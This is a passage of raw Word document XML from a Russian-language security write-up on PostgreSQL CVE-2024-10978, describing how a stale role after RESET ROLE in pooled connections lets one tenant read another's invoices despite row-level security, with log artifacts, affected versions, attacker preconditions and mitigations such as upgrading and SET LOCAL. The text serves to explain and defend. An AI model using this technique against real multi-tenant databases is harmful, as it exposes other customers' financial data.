        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Effective </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> корректно переключается на tenant_99 (для авторизации новых operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CA585" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Plan-cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для same SQL содержит RLS-expanded expression от tenant_42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6BDDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Subsequent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняет cached plan с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tenant_42's RLS filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — tenant_99 видит invoices tenant 42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F1D0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через diagnostic logging):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA8478" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOG:  execute &lt;unnamed&gt;: SELECT id, amount, paid_at, description FROM billing.invoices ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818B606" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL:  Plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470BFA7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         Seq Scan on invoices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31958658" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            Filter: ((tenant_id = (current_setting('app.tenant_id'))::int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FBE40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                     AND (paid_at &gt; (now() - '30 days'::interval)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4286C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         -- ↑ RLS expression captured при первом plan; current_setting evaluating dynamically,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793843FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         --    но cached plan может иметь folded constant вместо expression вызова</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E957C14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если RLS-policy expression была </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>constant-folded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в plan (для optimization), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('app.tenant_id')::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (значение на момент cache), и второй tenant видит invoices первого даже после изменения SET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C60194" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 3 (alternative path) — RESET ROLE leak</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12375D6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2024-10978 specifically about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESET ROLE leaving incorrect user_id</w:t>
      </w:r>
      <w:r>
        <w:t>. После RESET ROLE определённые subsequent queries могут исполняться с stale role identifier — что для RLS-таблиц означает «никакая policy не применяется» (если stale ID == owner/superuser) или «policy применяется для wrong tenant».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71076C65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cross-tenant invoice exfiltration: tenant 99 видит invoices tenant 42 (и наоборот). Severity критична для billing/financial data — direct compliance violation (GDPR/SOC2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D64412" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE373C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auto_explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: log с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> expression, который не matches current </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>/SET app.tenant_id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599EAB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Application logs: tenant видит «extra» invoices, обнаруживаются через customer complaints (классический pattern detection — пользователь жалуется на «not my invoice»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD3F5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t>: одна query, разные rows-returned между sessions с разными roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19050CC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Технический mechanism тот же, что в 3.13.1 — баг в reset path SET ROLE / SET SESSION AUTHORIZATION в PG ≤ 17.0/16.4/15.8/14.13/13.16/12.20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C74205" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Из CVE advisory: *"Incorrect privilege assignment in PostgreSQL allows a less-privileged application user to view or change different rows from those intended. An attack requires the application to use SET ROLE, SET SESSION AUTHORIZATION, or an equivalent feature. The problem arises when an application query uses values from the user under attack."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043CA7F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Тот же баг даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>два разных outcome</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260462CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.13.1): функция или операция, требующая высоких привилегий, выполняется под stale role-id, который их имеет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F5BE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.17.3): SELECT/UPDATE/DELETE применяет policy от stale role-id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85189D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита та же — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade на patched PG-версию</w:t>
      </w:r>
      <w:r>
        <w:t>. Workarounds (для непатченных) — те же, что в 3.17.1: connection-per-tenant или DISCARD ALL после RESET ROLE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E1043" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительная mitigation для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.3 specifically</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session-level RLS variables вместо role-based</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9289EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Альтернативный pattern без SET ROLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1E353" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Application всегда исполняет от одного role (application_user),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3AB0CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- но RLS policy filter по session-variable, не current_user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DBDE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A41EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY tenant_invoices_v2 ON billing.invoices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FC4C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id', true)::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC585D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6B45C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Application code (без SET ROLE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD21FAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54167CDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def tenant_session(tenant_id: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC08FD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with async_session_factory() as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5ADA02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        await session.execute(text(f"SET LOCAL app.tenant_id = '{tenant_id}'"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A73D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # ↑ SET LOCAL — scoped to current transaction, auto-reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEAD545" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        yield session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504B3ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET LOCAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) auto-resets at transaction-end, eliminating reset-path bug. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Это не полная защита</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — но снижает attack surface для CVE-2024-10978-specific reset path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10774851" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E0E43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20 (same as 3.17.1, both CVEs fixed 14.11.2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15FB14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валидная tenant-role + application использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request + connection pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E06D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SET ROLE per-request + RLS на user-data tables + plan cache enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D68E7AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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60C3E65B"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C8CD102"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13B088D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3AB2F3D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6928CB"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ED7A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10978</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="26523BC2"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4122FE"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E86AB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.2 (Medium, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
